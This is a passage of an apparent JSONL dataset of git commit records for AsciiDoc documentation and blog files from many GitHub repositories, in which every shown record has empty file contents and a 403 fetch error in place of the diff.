'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"620b5837cc923bfb78d593159e06503317408191","subject":"More details","message":"More details\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Automated Eclipse install.adoc","new_file":"Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d86c11e260e30e2954f7a9827e99e98bfe5616c","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"079e4a5a44ee6d041d9f06e16ad9a5bdeeb1fc86","subject":"Captain's Log FAQ (edit)","message":"Captain's Log FAQ (edit)\n","repos":"0xMF\/toybox","old_file":"captain's_log.asciidoc","new_file":"captain's_log.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/0xMF\/toybox.git\/': The requested URL returned error: 
403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"5a95dafa5ee9e2d7ef096654e1d73b1d92c5b1e8","subject":"APPNG-2001 use different placeholders for snapshot and stable versions, made links external","message":"APPNG-2001 use different placeholders for snapshot and stable versions,\nmade links external","repos":"appNG\/appng,appNG\/appng,appNG\/appng","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/appNG\/appng.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"75e0bd381fcae573a9993fbf438201c49579c992","subject":"Add Code of Conduct","message":"Add Code of Conduct\n","repos":"jvalkeal\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,markpollack\/spring-cloud-dataflow,markpollack\/spring-cloud-dataflow,ghillert\/spring-cloud-dataflow,ilayaperumalg\/spring-cloud-dataflow,markfisher\/spring-cloud-dataflow,ericbottard\/spring-cloud-dataflow,markpollack\/spring-cloud-dataflow,markfisher\/spring-cloud-dataflow,cppwfs\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,cppwfs\/spring-cloud-dataflow,mbogoevici\/spring-cloud-data,trisberg\/spring-cloud-dataflow,jvalkeal\/spring-cloud-data,jvalkeal\/spring-cloud-dataflow,spring-cloud\/spring-cloud-data,donovanmuller\/spring-cloud-dataflow,markfisher\/spring-cloud-data,mminella\/spring-cloud-data,ilayaperumalg\/spring-cloud-dataflow,markfisher\/spring-cloud-dataflow,jvalkeal\/spring-cloud-data,sabbyanandan\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,sabbyanandan\/spring-cloud-dataflow,ghillert\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,ilayaperumalg\/spring-cloud-dataflow,markfisher\/spring-cloud-data,spring-cloud\/spring-cloud-data,spring-cloud\/spring-cloud-data,trisberg\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,trisberg\/spring-cloud-dataflow,sabbyanandan\/spring-cloud-dataflow,donovanmuller\/spring-cloud-dataflow,mminella\/spring-cloud-data,spring-cloud\/spring-cloud-dataflow,markfisher\/spring-cloud-dataflow,jvalkeal\/spring-cloud-data,mbogoevici\/spring-cloud-data,markfisher\/spring-cloud-data,donovanmuller\/spring-cloud-dataflow,mbogoevici\/spring-cloud-data,jvalkeal\/spring-cloud-dataflow,cppwfs\/spring-cloud-dataflow,ericbottard\/spring-cloud-dataflow,ericbottard\/spring-cloud-dataflow,trisberg\/spring-cloud-dataflow","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markfisher\/spring-cloud-dataflow.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"becd9c4c8267ae5512e7a631069dfc8f58fdd19d","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f350c6e58bf18fae54c6af77bc37fed14e83a7f","subject":"Update data provider documentation to describe the new design (#8317)","message":"Update data provider 
documentation to describe the new design (#8317)\n\n","repos":"peterl1084\/framework,peterl1084\/framework,kironapublic\/vaadin,asashour\/framework,Legioth\/vaadin,mstahv\/framework,kironapublic\/vaadin,Legioth\/vaadin,kironapublic\/vaadin,peterl1084\/framework,Darsstar\/framework,Darsstar\/framework,Darsstar\/framework,Legioth\/vaadin,mstahv\/framework,kironapublic\/vaadin,asashour\/framework,asashour\/framework,mstahv\/framework,mstahv\/framework,asashour\/framework,mstahv\/framework,peterl1084\/framework,Legioth\/vaadin,asashour\/framework,kironapublic\/vaadin,Darsstar\/framework,Darsstar\/framework,Legioth\/vaadin,peterl1084\/framework","old_file":"documentation\/datamodel\/datamodel-providers.asciidoc","new_file":"documentation\/datamodel\/datamodel-providers.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/peterl1084\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eb85fab4ab39f6486e2d13c031ba6c35b4b7c5bc","subject":"Updated sample design","message":"Updated sample design\n","repos":"ufried\/resilience-tutorial,ufried\/resilience-tutorial","old_file":"exercise_02_complete_parameter_checking\/design.adoc","new_file":"exercise_02_complete_parameter_checking\/design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ufried\/resilience-tutorial.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c2b03a9bfd615e2426d25316b15b74d125db4c26","subject":"Update 2016-03-28-improve-your-java-environment-with-docker.adoc","message":"Update 2016-03-28-improve-your-java-environment-with-docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-improve-your-java-environment-with-docker.adoc","new_file":"_posts\/2016-03-28-improve-your-java-environment-with-docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3dc54fd3476ddcd5c920eefdaac4a372ebdd718a","subject":"Added description of tasks to follow up stroke patient","message":"Added description of tasks to follow up stroke patient\n","repos":"DIPSASA\/dips-ckm,bjornna\/dips-ckm","old_file":"doc\/openehr-task\/workflow-13-stroke.adoc","new_file":"doc\/openehr-task\/workflow-13-stroke.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bjornna\/dips-ckm.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ede521dc8d3c15fe6ade08f7561bf2609ff6e932","subject":"authorizeUrls -> authorizeRequests","message":"authorizeUrls -> authorizeRequests\n\nReplace remaining authorizeUrls with authorizeRequests\n\nFixes 
gh-3875\n","repos":"djechelon\/spring-security,pwheel\/spring-security,thomasdarimont\/spring-security,djechelon\/spring-security,ollie314\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,thomasdarimont\/spring-security,thomasdarimont\/spring-security,wkorando\/spring-security,kazuki43zoo\/spring-security,fhanik\/spring-security,spring-projects\/spring-security,SanjayUser\/SpringSecurityPro,SanjayUser\/SpringSecurityPro,thomasdarimont\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,eddumelendez\/spring-security,wkorando\/spring-security,SanjayUser\/SpringSecurityPro,rwinch\/spring-security,thomasdarimont\/spring-security,olezhuravlev\/spring-security,fhanik\/spring-security,kazuki43zoo\/spring-security,ollie314\/spring-security,kazuki43zoo\/spring-security,olezhuravlev\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,mdeinum\/spring-security,kazuki43zoo\/spring-security,wkorando\/spring-security,olezhuravlev\/spring-security,SanjayUser\/SpringSecurityPro,fhanik\/spring-security,mdeinum\/spring-security,kazuki43zoo\/spring-security,mdeinum\/spring-security,spring-projects\/spring-security,olezhuravlev\/spring-security,pwheel\/spring-security,pwheel\/spring-security,fhanik\/spring-security,jgrandja\/spring-security,rwinch\/spring-security,pwheel\/spring-security,ollie314\/spring-security,djechelon\/spring-security,jgrandja\/spring-security,SanjayUser\/SpringSecurityPro,spring-projects\/spring-security,olezhuravlev\/spring-security,fhanik\/spring-security,eddumelendez\/spring-security,fhanik\/spring-security,djechelon\/spring-security,jgrandja\/spring-security,pwheel\/spring-security,wkorando\/spring-security,rwinch\/spring-security,eddumelendez\/spring-security,jgrandja\/spring-security,rwinch\/spring-security,ollie314\/spring-security,djechelon\/spring-security,eddumelendez\/spring-security,mdeinum\/spring-security,eddumelendez\/spring-security,jgrandja\/spring-security,jgrandja\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/index.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fhanik\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7cf7154abbf58f308b785decccdf5369d82cc8b7","subject":"y2b create post The Most Requested Smartphone I've NEVER Featured...","message":"y2b create post The Most Requested Smartphone I've NEVER Featured...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-24-TheMostRequestedSmartphoneIveNEVERFeatured.adoc","new_file":"_posts\/2017-12-24-TheMostRequestedSmartphoneIveNEVERFeatured.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"964ecb4a5f8371695b8de3c945fe3bd88656df78","subject":"Update 2017-04-25-Server-Virtualization-Management-Part2.adoc","message":"Update 
2017-04-25-Server-Virtualization-Management-Part2.adoc","repos":"roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io","old_file":"_posts\/2017-04-25-Server-Virtualization-Management-Part2.adoc","new_file":"_posts\/2017-04-25-Server-Virtualization-Management-Part2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/roobyz\/roobyz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab236f4ecf719e51bee1aadd09cb18da0e027323","subject":"y2b create post Got an iPad Air","message":"y2b create post Got an iPad Air","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-11-01-Got-an-iPad-Air.adoc","new_file":"_posts\/2013-11-01-Got-an-iPad-Air.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f87b329a40a19359acc5bc392562df1a38ece672","subject":"Update 2018-05-28-Swift-Firestore.adoc","message":"Update 2018-05-28-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f82cccf93b845127c3b3f5f5a89aae3a1bdfe5d6","subject":"Fix source code for data driven triggers Add missing conditions types Change plugin template name","message":"Fix source code for data driven triggers\nAdd missing conditions types\nChange plugin template name\n","repos":"jotak\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/community\/docs\/developer-guide\/alerts.adoc","new_file":"src\/main\/jbake\/content\/community\/docs\/developer-guide\/alerts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9552c7cbc83b85b1affb4b6911005c43d6eff4c2","subject":"y2b create post Google+ Tutorial (Tips \\u0026 Tricks)","message":"y2b create post Google+ Tutorial (Tips \\u0026 
Tricks)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-08-10-Google-Tutorial-Tips-u0026-Tricks.adoc","new_file":"_posts\/2011-08-10-Google-Tutorial-Tips-u0026-Tricks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a48d8d30a5154ee31e526f1669ad29d57919c222","subject":"added changelog","message":"added changelog\n","repos":"sdaschner\/jaxrs-analyzer,cthiebaud\/jaxrs-analyzer,cthiebaud\/jaxrs-analyzer","old_file":"Changelog.adoc","new_file":"Changelog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cthiebaud\/jaxrs-analyzer.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a7be7b9db6dcfbad216f747901d3a9e0d1c3ca74","subject":"Added conversatins docs","message":"Added conversatins docs\n","repos":"smoope\/java-sdk","old_file":"src\/main\/resources\/docs\/sdk-reference.adoc","new_file":"src\/main\/resources\/docs\/sdk-reference.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smoope\/java-sdk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"baed0ec5ecad1fc9534e86ba498edb09289a3165","subject":"remove extra subsection heading","message":"remove extra subsection heading\n","repos":"cfn-stacks\/artifacts3-plugin","old_file":"src\/docs\/asciidoc\/index.adoc","new_file":"src\/docs\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cfn-stacks\/artifacts3-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4710a59c5e2dcb0a6661a4862c26a096813df4be","subject":"Update 2017-01-30-The-Start-of-a-New-Term.adoc","message":"Update 2017-01-30-The-Start-of-a-New-Term.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2017-01-30-The-Start-of-a-New-Term.adoc","new_file":"_posts\/2017-01-30-The-Start-of-a-New-Term.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5630acad792c5b20ca466b263305bd95d4cb553","subject":"Publish 201-01-31-Auto-Geo-Coder-e-G-Mps-Tile-Merger.adoc","message":"Publish 201-01-31-Auto-Geo-Coder-e-G-Mps-Tile-Merger.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"201-01-31-Auto-Geo-Coder-e-G-Mps-Tile-Merger.adoc","new_file":"201-01-31-Auto-Geo-Coder-e-G-Mps-Tile-Merger.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"92b6e615052aa5553688dba4a651a7839c0221bb","subject":"Update 2016-02-16-All-Important-Context-Maps.adoc","message":"Update 
2016-02-16-All-Important-Context-Maps.adoc","repos":"jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io","old_file":"_posts\/2016-02-16-All-Important-Context-Maps.adoc","new_file":"_posts\/2016-02-16-All-Important-Context-Maps.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmelfi\/jmelfi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8747a5aa71f764ad8dbaba243e9a2af81f1a4463","subject":"y2b create post Hammer vs iPhone - How Can It Possibly Survive?","message":"y2b create post Hammer vs iPhone - How Can It Possibly Survive?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-12-Hammer-vs-iPhone--How-Can-It-Possibly-Survive.adoc","new_file":"_posts\/2016-07-12-Hammer-vs-iPhone--How-Can-It-Possibly-Survive.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5e44ad4b729e2e5b21037a0d7a0bc6681566221a","subject":"Update 2017-06-17-Installing-Fabric8-on-Azure-Container-Service.adoc","message":"Update 2017-06-17-Installing-Fabric8-on-Azure-Container-Service.adoc","repos":"pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io","old_file":"_posts\/2017-06-17-Installing-Fabric8-on-Azure-Container-Service.adoc","new_file":"_posts\/2017-06-17-Installing-Fabric8-on-Azure-Container-Service.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pdudits\/pdudits.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"048bd1b63b967353a60753d9775f6ace0f9fa570","subject":"Update","message":"Update\n","repos":"enng0227\/fis3,FrancesShih\/fis3,liukaijv\/fis3,BobJavascript\/fis3,liaolunhui\/fis3,wenyang12\/fis3,sweet3c\/fis3,philip8728\/fis3,mircle\/fis3,blue2sky\/fis3,alannesta\/fis3,Suninus\/fis3,sxlfzhy\/fis3,wenyang12\/fis3,7213\/fis3,7213\/fis3,shijunwei\/fis3,shijunwei\/fis3,alannesta\/fis3,fengshao0907\/fis3,taohaoge\/fis3,fengshao0907\/fis3,sxlfzhy\/fis3,evilemon\/fis3,aifeld\/fis3,loopnz\/fis3,jincdream\/fis3,magicstf\/fis3,sweet3c\/fis3,liukaijv\/fis3,enng0227\/fis3,alannesta\/fis3,samlin08\/fis3,liaolunhui\/fis3,aifeld\/fis3,charleschaochen\/fis3,Suninus\/fis3,krock01\/fis3,lpshan\/fis3,xtidt\/fis3,gaoxiaopang\/fis3,samlin08\/fis3,mircle\/fis3,xtidt\/fis3,magicstf\/fis3,nieying\/fis3,atian25\/fis3,evilemon\/fis3,loopnz\/fis3,charleschaochen\/fis3,wenyang12\/fis3,enng0227\/fis3,xtidt\/fis3,gaoxiaopang\/fis3,7213\/fis3,fengshao0907\/fis3,magicstf\/fis3,sweet3c\/fis3,krock01\/fis3,gaoxiaopang\/fis3,jy03078959\/fis3,blue2sky\/fis3,enng0227\/fis3,taohaoge\/fis3,charleschaochen\/fis3,Brother-Simon\/fis3,jy03078959\/fis3,blue2sky\/fis3,fex-team\/fis3,krock01\/fis3,sxlfzhy\/fis3,krock01\/fis3,liaolunhui\/fis3,taohaoge\/fis3,yonglehou\/fis3,fex-team\/fis3,sweet3c\/fis3,shijunwei\/fis3,FrancesShih\/fis3,7213\/fis3,liaolunhui\/fis3,blue2sky\/fis3,richard-chen-1985\/fis3,jy03078959\/fis3,ybg555\/fis3,7213\/fis3,FrancesShih\/fis3,lpshan\/fis3,philip8728\/fis3,fex-team\/fis3,samlin08\/fis3,loopnz\/fis3,gaoxiaopang\/fis3,Brother-Simon\/fis3,BobJavascript\/fis3,jy03078959\/fis3,ybg555\/fis3,atian25\/fis3,sxlfzhy\/fis3,taohaoge\/fis3,richard-chen-1985\/fis3,yonglehou\/fis3,atian25\/fis3,fex-team\/fis3,philip8728\/fis3,jincdream\/fis3,Brother-Simon\/fis3,krock01\/fis3,magicstf\/fis3,jincdream\/fis3,FrancesShih\/fis3,yonglehou\/fis3,Suninus\/fis3,nieying\/fis3,richard-chen-1985\/fis3,hechunwen\/fis3,charleschaochen\/fis3,liukaijv\/fis3,liaolunhui\/fis3,gaoxiaopang\/fis3,samlin08\/fis3,samlin08\/fis3,lpshan\/fis3,evilemon\/fis3,jy03078959\/fis3,evilemon\/fis3,nieying\/fis3,alannesta\/fis3,lpshan\/fis3,fengshao0907\/fis3,ybg555\/fis3,xtidt\/fis3,loopnz\/fis3,Brother-Simon\/fis3,sxlfzhy\/fis3,yonglehou\/fis3,atian25\/fis3,jincdream\/fis3,fengshao0907\/fis3,atian25\/fis3,philip8728\/fis3,blue2sky\/fis3,fex-team\/fis3,ybg555\/fis3,hechunwen\/fis3,wenyang12\/fis3,richard-chen-1985\/fis3,enng0227\/fis3,nieying\/fis3,aifeld\/fis3,Suninus\/fis3,philip8728\/fis3,mircle\/fis3,aifeld\/fis3,taohaoge\/fis3,liukaijv\/fis3,BobJavascript\/fis3,aifeld\/fis3,liukaijv\/fis3,shijunwei\/fis3,hechunwen\/fis3,nieying\/fis3,lpshan\/fis3,BobJavascript\/fis3,charleschaochen\/fis3,Brother-Simon\/fis3,mircle\/fis3,wenyang12\/fis3,alannesta\/fis3,hechunwen\/fis3,shijunwei\/fis3","old_file":"doc\/index.adoc","new_file":"doc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alannesta\/fis3.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"45b4b2425a856a6b85f17c6923601d9db19415d0","subject":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","message":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","repos":"shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io","old_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/shinchiro\/shinchiro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c58c935042ff619879d5337994265de289635b9","subject":"Update 2017-02-21-Roasted-Cauliflower-Soup.adoc","message":"Update 2017-02-21-Roasted-Cauliflower-Soup.adoc","repos":"zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io","old_file":"_posts\/2017-02-21-Roasted-Cauliflower-Soup.adoc","new_file":"_posts\/2017-02-21-Roasted-Cauliflower-Soup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zestyroxy\/zestyroxy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9610a99022f047a4d928cf8a3ce22f082eb5456d","subject":"Update 2017-10-17-Three-short-Emacs-tips-for-Windows.adoc","message":"Update 2017-10-17-Three-short-Emacs-tips-for-Windows.adoc","repos":"sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io","old_file":"_posts\/2017-10-17-Three-short-Emacs-tips-for-Windows.adoc","new_file":"_posts\/2017-10-17-Three-short-Emacs-tips-for-Windows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebasmonia\/sebasmonia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0cb583d0ef5f015c9b8c1e61a651a0439ef9693a","subject":"Minor format changes to style guide.","message":"Minor format changes to style guide.\n","repos":"keithtyler\/artifacts,sebastianwelsh\/artifacts,sebastianwelsh\/artifacts,pidydx\/artifacts,keithtyler\/artifacts,destijl\/artifacts,crankyoldgit\/artifacts,vonnopsled\/artifacts,pidydx\/artifacts,crankyoldgit\/artifacts,vonnopsled\/artifacts,destijl\/artifacts","old_file":"docs\/style_guide.adoc","new_file":"docs\/style_guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crankyoldgit\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d431580c5c00b210a3a2bcbb7505ed34c7455c45","subject":"Add news\/2016-08-31-forge-3.3.1.final.asciidoc","message":"Add news\/2016-08-31-forge-3.3.1.final.asciidoc\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2016-08-31-forge-3.3.1.final.asciidoc","new_file":"news\/2016-08-31-forge-3.3.1.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"516ea6937a8ac09ff0ade440ef08c28bc5210124","subject":"Fixes #1944: Add a Readme file for Cf-clerk","message":"Fixes #1944: Add a Readme file for Cf-clerk\n","repos":"ncharles\/cf-clerk,VinceMacBuche\/cf-clerk,fanf\/cf-clerk","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fanf\/cf-clerk.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"02af7685d80435a19da75958513a2878546091ff","subject":"Ilies updates","message":"Ilies 
updates\n","repos":"gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs","old_file":"pages\/cockpit\/user-guide\/api-designer.adoc","new_file":"pages\/cockpit\/user-guide\/api-designer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cefb8cf78ebe55a8ded3d852cc7bc7b5bac06a82","subject":"Update 2017-01-27-Model.adoc","message":"Update 2017-01-27-Model.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-27-Model.adoc","new_file":"_posts\/2017-01-27-Model.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1bcac6cca3352dc1d174382b7393916ecec2e5ba","subject":"- Added rough draft of JDG xPaaS Image documentation - Included environment variables, datasource, security, and cache information. - Incorporated dpalmer's feedback.","message":"- Added rough draft of JDG xPaaS Image documentation\n- Included environment variables, datasource, security, and cache information.\n- Incorporated dpalmer's feedback.\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"using_images\/xpaas_images\/data_grid.adoc","new_file":"using_images\/xpaas_images\/data_grid.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xiaoping378\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4282a5e8e611adfde07370e0f123b3ebf3d91db5","subject":"Link to errbit's new github home.","message":"Link to errbit's new github 